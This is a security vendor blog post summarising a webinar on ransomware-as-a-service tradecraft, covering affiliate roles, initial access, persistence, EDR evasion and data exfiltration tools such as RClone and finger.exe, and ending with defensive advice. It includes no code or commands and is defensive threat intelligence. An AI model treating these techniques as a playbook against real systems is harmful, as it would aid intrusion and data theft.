Home Blog Beyond the RaaS Headlines: The Reality of Ransomware Tradecraft Published: May 20, 2026 Beyond the RaaS Headlines: The Reality of Ransomware Tradecraft By: Harlan Carvey Lindsey O'Donnell-Welch Ransomware actors following a ransomware-as-a-service (or RaaS) model are often described as one cohesive threat actor. But reality - and what we see in actual incidents - is far different. RaaS powers an ecosystem made up of ransomware operators, affiliates, and initial access brokers (IABs). That structure is important because it means the name on the ransom note or in the encrypted file extension doesn’t reliably explain how an intrusion started or actions the attacker took (recon, data theft, etc.) in the victim’s environment. The same ransomware family (whether it’s Akira , Qilin , or LockBit) can show up across very different intrusion chains. One attack may start with phishing or a help-desk scam. Another may begin with exposed RDP, and yet another may come through a rogue remote monitoring and management (RMM) tool. That means defenders cannot assume that one ransomware brand equals one consistent playbook. In many cases, it is the affiliate, and not the ransomware operator, that dictates the tradecraft. During this month’s Tradecraft Tuesday, Huntress’ Harlan Carvey , Principal Threat Intelligence Analyst, and Lindsey O’Donnell-Welch , Principal Technical Community Engagement Writer, explained how the RaaS economy plays out in attacker tradecraft during on-the-ground incidents. What is RaaS? But first, what is RaaS ? At a high level, the business model is straightforward. Ransomware operators provide, maintain, and update the variant itself, and manage ransomware infrastructure, including leak sites and post-compromise ransom negotiations. Affiliates handle the “dirty work” across victim environments – including recon, initial access, hands-on-keyboard activity, any data theft, and deploying the file encryptor. For example, in practice, Qilin operators maintain the ransomware, recruit affiliates, and provide the surrounding business infrastructure, including leak sites, payment portals, and even legal support functions. Meanwhile, Qilin’s range of affiliates show why attribution gets messy. Its affiliate base is unusually diverse, spanning actors like Scattered Spider, Moonstone Sleet, and Devman. That means one ransomware brand can sit behind very different intrusion styles, skill levels, and operational behaviors. Figure 1: A breakdown of how the Qilin RaaS model works Initial access: What we see One of the clearest realities in ransomware intrusions is that initial access is all over the map. Access may come through social engineering, remote access services, or a pre-existing foothold purchased from an IAB. Threat actors continue to abuse legitimate tools and pathways because they blend in. We see ransomware affiliates gaining initial access via: Remote Desktop Protocol : Threat actors use weak or compromised RDP credentials; or even enable RDP via the SMB protocol or Microsoft SQL Server (MSSQL) Vulnerable edge appliances : in 2025, threat actors targeted SonicWall VPNs before deploying Akira ransomware Rogue RMMs : threat actors use RMMs like ScreenConnect, TeamViewer , or Bomgar to get into the victim’s environment When RMMs are involved, in MSP-centric environments, one compromised instance can open the door to many downstream victims at once. That’s what we saw with an incident detected on April 14, when a ransomware campaign hit multiple organizations through a compromised Bomgar remote support environment belonging to a dental software company with software installed across dozens of organizations. Figure 2: In April, threat actors used Bomgar to gain access to multiple organization environments before deploying ransomware. Ransomware persistence, defense evasion, and exfiltration Persistence in ransomware intrusions stems from a variety of methods. For example, threat actors will create new users, and some will also take steps to “hide” the user accounts from the Welcome Screen visible via Terminal Services/RDP. They may also install RMMs post-initial compromise to retain access, including Chrome Remote Desktop and AnyDesk . Figure 3: In a March incident, ransomware actors used Chrome Remoting Desktop and AnyDesk These persistence mechanisms may look basic, but they keep the intrusion alive long enough for the threat actor to reach the next phase of their attack, including exfiltration or encryption. We also see various defense evasion techniques. Some attackers do very little to cover their tracks; others use Defender exclusions. Sometimes, however, threat actors use more aggressive tactics, such as EDR and AV killers or Bring Your Own Vulnerable Driver (BYOVD) activity. While these attempt to fully remove security tools, it’s worth noting that EDR killers are often noisy. Ransomware actors stage data by consolidating and compressing it into encrypted archives using tools like 7-Zip. For the actual exfiltration of data itself, we’ve seen various techniques, including the use of cloud storage tools MegaSync , RClone , as well as S5cmd and even finger.exe . Figure 4: Different types of data staging and exfiltration techniques Rethinking ransomware The most useful way to think about ransomware is not as a fixed actor, but as a shifting intrusion model. The payload name tells you what was deployed. It does not tell you enough about the access path, the persistence mechanisms, the controls that failed, or the tradecraft that got the attacker to the finish line. That is why the security fundamentals still matter so much. We recommend defenders take the following steps to protect their organizations: Maintain an asset inventory Reduce your attack surface Deploy monitoring broadly If you’ve already been compromised, investigate the incident without making assumptions based on branding alone If the real intrusion path is missed, the same foothold can remain available for a return attack later, including under a different ransomware banner entirely. Like what you just read? Join us every month for Tradecraft Tuesday, our live webinar where we expose hacker techniques and talk nerdy with live demos. Our next episode, "We Need to Talk About Device Code Phishing," will take place on June 9 at 1pm ET. Snag your spot now! Categories Cybersecurity Education Summarize with AI ChatGPT Claude Perplexity Google AI Summarize This Page ChatGPT Claude Perplexity Google AI See Huntress in action Our platform combines a suite of powerful managed detection and response tools for endpoints and Microsoft 365 identities, science-backed security awareness training, and the expertise of our 24/7 Security Operations Center (SOC). Book a Demo Share You Might Also Like How a Pharmacy Cyberattack is a Warning Sign for Healthcare’s Cybersecurity Vulnerabilities Learn how a single cyberattack on a pharmacy tech provider disabled access for millions of patients and what it means for the healthcare industry moving forward. Learn More What Is Managed Detection and Response? What is managed detection and response (MDR) and why is it so important? Dive into the benefits of MDR services and how it can address critical security gaps. Learn More Creating a Better Why for Cyber Security Awareness Training Understand the importance of cybersecurity awareness training and how it can significantly reduce risks in your organization. Learn More What the OpenAI Court Order Means for Cybersecurity and Privacy Learn what the OpenAI lawsuit and court order mean for data privacy, cybersecurity, and the future of AI innovation. Learn More Closing the Gap: Managed ITDR Now Supports Identity Disablement for Active Directory Synced Identities Huntress Managed ITDR closes the gap with AD-synchronized identity disablement. Secure identities on-prem and in the cloud with this powerful update. Learn More Huntress Is Now a CVE Numbering Authority. But What Does That Mean? Huntress is officially a CVE Numbering Authority. Stay tuned as we keep our eye out for new vulnerabilities in cyberspace. Learn More CIS Controls Security Awareness Training Learn more about how Huntress' Managed Security Awareness Program can help your employees follow CIS control requirements. Learn More Hiding In Plain Sight There’s no end to the stealthy ways in which attackers develop and execute their tradecraft. In this case, it's as simple as hiding in plain sight. Learn More Sign Up for Huntress Updates Get insider access to Huntress tradecraft, killer events, and the freshest blog updates. Business Email* Privacy • Terms Submit By submitting this form, you accept our Terms of Service & Privacy Policy